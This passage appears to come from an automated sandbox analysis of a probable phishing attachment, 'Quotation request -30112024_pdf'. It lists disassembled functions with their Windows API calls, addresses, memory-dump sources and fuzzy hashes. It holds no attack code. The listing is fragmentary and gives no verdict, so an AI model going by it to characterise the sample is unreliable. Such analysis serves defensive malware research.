• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
• Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: \VH
                                                                    • API String ID: 2507767853-234962358
                                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                    • String ID: crts
                                                                    • API String ID: 943502515-3724388283
                                                                    • Opcode ID: 498c0d6e7309f6f0c265017fcc9d8cea2eeade816043c4fb7f6070666b64c2a7
                                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                    • Opcode Fuzzy Hash: 498c0d6e7309f6f0c265017fcc9d8cea2eeade816043c4fb7f6070666b64c2a7
                                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$LabelVolume
                                                                    • String ID: \VH
                                                                    • API String ID: 2006950084-234962358
                                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                    • DrawMenuBar.USER32 ref: 00449761
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                    • String ID: 0
                                                                    • API String ID: 772068139-4108050209
                                                                    • Opcode ID: d71aae844a00a6bc18d0c30cfc9cbf4787bee99b623b93684d7d7440456c6ae2
                                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                    • Opcode Fuzzy Hash: d71aae844a00a6bc18d0c30cfc9cbf4787bee99b623b93684d7d7440456c6ae2
                                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcscpy
                                                                    • String ID: 3, 3, 8, 1
                                                                    • API String ID: 3469035223-357260408
                                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                    • API String ID: 2574300362-3530519716
                                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                    • API String ID: 2574300362-275556492
                                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                    • API String ID: 2574300362-58917771
                                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                    • __itow.LIBCMT ref: 004699CD
                                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                    • __itow.LIBCMT ref: 00469A97
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                    APIs
                                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
